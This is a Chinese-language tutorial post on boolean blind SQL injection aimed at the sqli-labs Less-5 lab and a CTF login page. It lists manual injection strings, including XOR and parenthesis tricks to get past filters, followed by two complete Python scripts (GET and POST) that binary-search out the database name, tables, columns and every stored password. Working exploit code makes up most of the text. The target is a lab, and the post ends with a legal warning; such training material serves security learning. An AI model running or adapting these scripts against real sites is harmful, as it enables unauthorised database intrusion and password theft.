SQL盲注二分法注入脚本
sql盲注二分法注入脚本
此脚本可以用来检测sql靶场第五关
http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1
手工注入
猜测数据库 ?id=1' and length(database())=8-- - id=1' and left(database(),1)>'a' -- - 1 id=1' and left(database(),1)>'z' -- - 0 在a-z之间 id=1' and left(database(),1)>'r' -- - 1 id=1' and left(database(),1)>'s' -- - 0 (首字母为 s) id=1' and left(database(),2)>'sa'-- - 猜测表 id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n a是从0开始的第几个表,b是第几个字符,n是ASCII所对应的十进制数 第一个表 ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 第二个表 ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101 判断user表 http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23 爆出字段 http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- - 盲注 时间盲注 ?id=1' and sleep(5)-- - ?id=1' and if(length(database())>=8,sleep(5),1)-- -
盲注 1'^(ascii(substr((select database()),%d,1))<%d)^1# 用括号绕过空格过滤 1'^(ascii(substr((select(database())),1,1))<1)^1# 逗号被过滤 1'^(ascii(substr((select(database()))from(1)for(1)))<1)^1# for被过滤 1'^(ascii(substr((select(database()))from(1)))<1)^1# (ascii() 只取最左边一个字符,所以省略 for 之后仍然可以逐位判断) MySQL|SUBSTR() 函数用法 https://zhuanlan.zhihu.com/p/110142732 布尔注入 改后面的数字 1'^(ascii(substr((select(database()))from(1)))<1)^1# 97 98 99 100 异或 ^ 绕过 = 1^1=0 1^0=1 0^0=0 每个字符的ascii码与给定的数字比较,得到一个布尔值b(0或1);整个表达式 1^b^1 等于 b,因此条件为真时查询 id=1 正常返回,条件为假时 id=0 无结果,页面内容的差异就是判断依据。
重点:构造payload:
"1'^(ascii(substr((select(database()))from(%d)))<%d)^1#"
"1'^(ascii(substr((select(database())),%d,1))<%d)^1#"
"?id=1'^(ascii(substr((select(database())),%d,1))<%d)^1-- -"
"?id=1'^(ascii(mid((select(database())),%d,1))<%d)^1-- -"
SQL盲注get二分法布尔注入
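#-*-coding:utf-8-*-
"""Boolean-based blind SQL injection (GET) against sqli-labs Less-5.

Every probe injects ``1'^(<condition>)^1-- -`` into ``id``.  Because
``1^b^1 == b`` the query matches the row ``id=1`` exactly when
<condition> is true, so the presence of TRUE_MARKER in the response is
the boolean oracle.  Each character of the target expression is recovered
with a binary search over its ASCII value (7 requests per character).

Only run this against a lab you own or are authorised to test.
"""

# Base URL of the vulnerable page.  It must NOT carry a query string: the
# ``id`` parameter is added by _oracle (appending to a URL that already
# had ``?id=1`` produced ``?id=1?id=1'...``).
host = "http://127.0.0.1/sqlilabs/Less-5/"

# Substring Less-5 prints only when the WHERE clause matched a row.
TRUE_MARKER = "You are in"

# Seconds to wait for each response; without a timeout a stalled server
# hangs the whole extraction.
TIMEOUT = 10

# Injected value; {expr} is evaluated one character at a time.  Parentheses
# stand in for spaces so the payload survives simple space filters.
PAYLOAD = "1'^(ascii(substr(({expr}),{pos},1))<{mid})^1-- -"


def _oracle(payload):
    """Send one injected ``id`` and report whether the TRUE branch was hit.

    ``params`` lets requests URL-encode the quote, caret, ``<`` and the
    ``-- -`` comment so PHP receives them verbatim.
    """
    # Imported here so the search helpers can be imported and unit tested
    # without the HTTP dependency or a live target.
    import requests

    res = requests.get(host, params={"id": payload}, timeout=TIMEOUT)
    return TRUE_MARKER in res.text


def _find_char(expr, pos, oracle):
    """Return the ASCII code of character ``pos`` (1-based) of ``expr``.

    Binary search on the invariant ``lo <= code < hi``; each probe asks
    ``code < mid`` and halves the interval.  0 means substr() returned the
    empty string, i.e. ``pos`` is past the end of the value.
    """
    lo, hi = 0, 128
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(PAYLOAD.format(expr=expr, pos=pos, mid=mid)):
            hi = mid
        else:
            lo = mid
    return lo


def _extract(expr, max_len, oracle):
    """Recover the string value of SQL expression ``expr`` character by character.

    Stops at code 0 (end of string) or 127: DEL does not occur in real
    data, and 127 is also where the search lands when ``expr`` yields NULL
    (``NULL < n`` is NULL, so every probe reads as false) -- stopping there
    avoids ``max_len`` wasted rounds of 7 requests each.
    """
    chars = []
    for pos in range(1, max_len + 1):
        code = _find_char(expr, pos, oracle)
        if code == 0 or code == 127:
            break
        chars.append(chr(code))
    return "".join(chars)


def getDatabase(oracle=None):
    """Print and return the current database name.

    ``oracle`` is a ``callable(payload) -> bool``; it defaults to the live
    HTTP oracle and can be swapped for a time-based or fake one.
    """
    ans = _extract("select(database())", 1000, oracle or _oracle)
    print("database is -> "+ans)
    return ans


def getTable(oracle=None):
    """Print and return the comma-joined table names of the current database."""
    expr = "select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())"
    ans = _extract(expr, 1000, oracle or _oracle)
    print("table is -> "+ans)
    return ans


def getColumn(oracle=None):
    """Print and return the comma-joined column names of the ``users`` table."""
    expr = "select(group_concat(column_name))from(information_schema.columns)where(table_name='users')"
    ans = _extract(expr, 1000, oracle or _oracle)
    print("column is -> "+ans)
    return ans


def dumpTable(oracle=None):
    """Print and return every ``password`` of ``users``, comma-joined.

    NOTE: group_concat is capped by group_concat_max_len (1024 bytes by
    default), so a large table is silently truncated; page through rows
    with LIMIT if the output ends abruptly.
    """
    ans = _extract("select(group_concat(password))from(users)", 10000, oracle or _oracle)
    print("dumpTable is -> "+ans)
    return ans


if __name__ == "__main__":
    # Guarded so importing the module (e.g. for tests) fires no requests.
    getDatabase()
    getTable()
    getColumn()
    dumpTable()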
sql盲注post二分法布尔注入
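#-*-coding:utf-8-*-
"""Boolean-based blind SQL injection (POST) against a login form.

Every probe injects ``1'^(<condition>)^1#`` as the username.  Because
``1^b^1 == b`` the WHERE clause flips with <condition>, and the login page
answers with TRUE_MARKER exactly when the condition is true (the
behaviour this script was written against).  Each character of the target
expression is recovered with a binary search over its ASCII value
(7 requests per character).

Only run this against a target you own or are authorised to test.
"""

# Login endpoint that receives the injected ``username``.
host = "http://web.jarvisoj.com:32787/login.php"

# Response text that marks the TRUE branch of the injected condition.
TRUE_MARKER = "用户名错误"

# Seconds to wait for each response; without a timeout a stalled server
# hangs the whole extraction.
TIMEOUT = 10

# Injected value; {expr} is evaluated one character at a time.  Parentheses
# stand in for spaces so the payload survives simple space filters.
PAYLOAD = "1'^(ascii(substr(({expr}),{pos},1))<{mid})^1#"


def _oracle(payload):
    """POST one injected username and report whether the TRUE branch was hit."""
    # Imported here so the search helpers can be imported and unit tested
    # without the HTTP dependency or a live target.
    import requests

    param = {"username": payload, "password": "admin"}
    res = requests.post(host, data=param, timeout=TIMEOUT)
    return TRUE_MARKER in res.text


def _find_char(expr, pos, oracle):
    """Return the ASCII code of character ``pos`` (1-based) of ``expr``.

    Binary search on the invariant ``lo <= code < hi``; each probe asks
    ``code < mid`` and halves the interval.  0 means substr() returned the
    empty string, i.e. ``pos`` is past the end of the value.
    """
    lo, hi = 0, 128
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(PAYLOAD.format(expr=expr, pos=pos, mid=mid)):
            hi = mid
        else:
            lo = mid
    return lo


def _extract(expr, max_len, oracle):
    """Recover the string value of SQL expression ``expr`` character by character.

    Stops at code 0 (end of string) or 127: DEL does not occur in real
    data, and 127 is also where the search lands when ``expr`` yields NULL
    (``NULL < n`` is NULL, so every probe reads as false) -- stopping there
    avoids ``max_len`` wasted rounds of 7 requests each.
    """
    chars = []
    for pos in range(1, max_len + 1):
        code = _find_char(expr, pos, oracle)
        if code == 0 or code == 127:
            break
        chars.append(chr(code))
    return "".join(chars)


def getDatabase(oracle=None):
    """Print and return the current database name.

    ``oracle`` is a ``callable(payload) -> bool``; it defaults to the live
    HTTP oracle and can be swapped for a time-based or fake one.
    """
    ans = _extract("select(database())", 1000, oracle or _oracle)
    print("database is -> "+ans)
    return ans


def getTable(oracle=None):
    """Print and return the comma-joined table names of the current database."""
    expr = "select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())"
    ans = _extract(expr, 1000, oracle or _oracle)
    print("table is -> "+ans)
    return ans


def getColumn(oracle=None):
    """Print and return the comma-joined column names of the ``admin`` table."""
    expr = "select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')"
    ans = _extract(expr, 1000, oracle or _oracle)
    print("column is -> "+ans)
    return ans


def dumpTable(oracle=None):
    """Print and return every ``password`` of ``admin``, comma-joined.

    NOTE: group_concat is capped by group_concat_max_len (1024 bytes by
    default), so a large table is silently truncated; page through rows
    with LIMIT if the output ends abruptly.
    """
    ans = _extract("select(group_concat(password))from(admin)", 10000, oracle or _oracle)
    print("dumpTable is -> "+ans)
    return ans


if __name__ == "__main__":
    # Guarded so importing the module (e.g. for tests) fires no requests.
    getDatabase()
    getTable()
    getColumn()
    dumpTable()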
作者:菜鸟-传奇
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。